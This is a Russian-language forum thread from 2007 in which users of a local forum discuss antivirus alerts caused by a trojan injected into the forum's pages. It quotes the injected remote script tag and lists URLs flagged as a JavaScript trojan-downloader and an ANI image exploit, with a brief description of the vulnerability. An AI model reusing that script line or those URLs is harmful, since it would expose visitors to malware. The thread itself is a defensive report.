Вирус при входе на локальные форумы

Тема в разделе "Техподдержка", создана пользователем Phenyx, 14 ноя 2007.

  1. Phenyx Новичок

    Регистрация:
    14 май 2007
    Сообщения:
    210
    Симпатии:
    12
    Внимание! Проверьте СВОИ компьютеры на вирусы!
    Вот тут еще.

    Вобщем болеет кто-то в сети.. Сервера тут ни причем.
    отредактировал mixan

    Первое сообщение темы:
     

    Вложения:

  2. Sky Child of Darkness

    Регистрация:
    24 фев 2007
    Сообщения:
    719
    Симпатии:
    18
    Раньше такая же фигня была, когда сидел на висте, потом не помню вроде сама собой решилась.
     
  3. Amatory Участник

    Регистрация:
    10 апр 2007
    Сообщения:
    272
    Симпатии:
    22
    У меня тоже самое
     
  4. fashuga Разведчик

    Регистрация:
    6 окт 2007
    Сообщения:
    447
    Симпатии:
    76
    у мя DR Web вроде не чо похожего не нашол:unknw:
     
  5. Phenyx Новичок

    Регистрация:
    14 май 2007
    Сообщения:
    210
    Симпатии:
    12
    У кого нибудь в исходном тексте форума есть строка <script language="javascript" src="http://fly.1234214.info/main.js"></script>?
     
  6. Phenyx Новичок

    Регистрация:
    14 май 2007
    Сообщения:
    210
    Симпатии:
    12
    Интересно, данная строка исчезла на всех страницах форума, и Каспер тоже ругаться перестал :unknw:. Значит кто-то что-то сделал, и на самом деле троян был на форуме
     
  7. Sky Child of Darkness

    Регистрация:
    24 фев 2007
    Сообщения:
    719
    Симпатии:
    18
    И тут атакуют нигде от хакеров прям спрятаться незяя)))
     
  8. spamm Активный участник

    Регистрация:
    8 мар 2007
    Сообщения:
    752
    Симпатии:
    232
    Провайдер:
    Мультинекс
    есть такое дело.
    без антивирусника поаккуратнее.
    Глори ты зачем нам форум заразил ? проверься на вирусы :wink:
     
  9. Sky Child of Darkness

    Регистрация:
    24 фев 2007
    Сообщения:
    719
    Симпатии:
    18
    Ага!!! вот кто тут пошалил))))
     
  10. Igor_B Скоро!!! Очень скоро!!!

    Регистрация:
    21 мар 2007
    Сообщения:
    1.976
    Симпатии:
    246
    Провайдер:
    Дом.ru
    Вирусы продолжают работать без сбоев :)
    Бум лечить, или пусть живут?
     
  11. STAN Модератор

    Регистрация:
    13 авг 2007
    Сообщения:
    1.565
    Симпатии:
    234
    Провайдер:
    Мультинекс
    иногда с вирусами безопаснее))))
    как же я был зол на каспера, когда он якобы вылечил вирус, удалив его, и пришлось ставить все заново, винду, дрова. сеть, впн))
    но это как повезет)))
     
  12. g`L Новичок

    Регистрация:
    10 июн 2007
    Сообщения:
    77
    Симпатии:
    15
    кто может пояснить что за вирус и как его лечить?
     
  13. Igor_B Скоро!!! Очень скоро!!!

    Регистрация:
    21 мар 2007
    Сообщения:
    1.976
    Симпатии:
    246
    Провайдер:
    Дом.ru
    Троян, но сегодня небыло сообщений от каспера.
     
  14. xxx Активный участник

    Регистрация:
    13 ноя 2007
    Сообщения:
    178
    Симпатии:
    113
    Провайдер:
    Спарк
    А у меня ДрВеб не жужжит :)
     
  15. DaveGibson Активный участник

    Регистрация:
    28 янв 2007
    Сообщения:
    546
    Симпатии:
    98
    Провайдер:
    WestCall
    Igor_B,
    А у меня сегодня "захрюкал", до этого наверное опера из кеша брала.
     
  16. Igor_B Скоро!!! Очень скоро!!!

    Регистрация:
    21 мар 2007
    Сообщения:
    1.976
    Симпатии:
    246
    Провайдер:
    Дом.ru
    Уже два вируса живёт :)

    Exploit.Win32.IMG-ANI.ac
    Программа-эксплойт, представляющая собой файл графического формата (bmp, cur, ico или ani). Размер файла произвольный. Наиболее типичен формат ani и малый размер файла (до нескольких КБ).
    Эксплуатирует уязвимость в алгоритме обработки графических файлов одной из системных библиотек Windows. При попытке просмотра файла, вследствие переполнения буфера на зараженной машине выполняется произвольный код.
    Идентификатор уязвимости — CAN-2004-1049. Исправлена в обновлении MS05-002 от Microsoft.
     
  17. Igor_B Скоро!!! Очень скоро!!!

    Регистрация:
    21 мар 2007
    Сообщения:
    1.976
    Симпатии:
    246
    Провайдер:
    Дом.ru
    Ссылки без установленного антивирусника со свежими базами не нажимать!!!
    Да и с установленным нерекомендую :biggrin:

    The requested URL http://down.goodnetads.org/tk/xl.js is infected with Trojan-Downloader.JS.Agent.aee virus

    http://down.goodnetads.org/tk/xl.js
    http://62live.ru/forum/showthread.php?p=30767#post30767
    Троянская программа
    Ttojn-Downloader.JS.Agent.aee


    The requested URL http://ads.1234214.info/tk/ani.c is infected with Exploit.Win32.IMG-ANI.ac virus

    файл
    http://ads.1234214.info/tk/ani.c
    Exploit.Win32.IMG-ANI.ac
     
  18. Phenyx Новичок

    Регистрация:
    14 май 2007
    Сообщения:
    210
    Симпатии:
    12
    Почему не предпринимается никаких действий по истреблению этой нечисти с нашего форума и предотвращению ее повторного там появления???
     
  19. mixan Активный участник

    Регистрация:
    27 янв 2007
    Сообщения:
    899
    Симпатии:
    105
    А откуда Вы знаете, какие действия предпринимаются, а какие нет?
    Очень прошу, не надо таких категоричных заявлений.
     
  20. Phenyx Новичок

    Регистрация:
    14 май 2007
    Сообщения:
    210
    Симпатии:
    12
    Извиняюсь. А как она туда попала то? И почему периодически появляется опять?
     

Пользователи просматривающие тему (Пользователей: 0, Гостей: 0)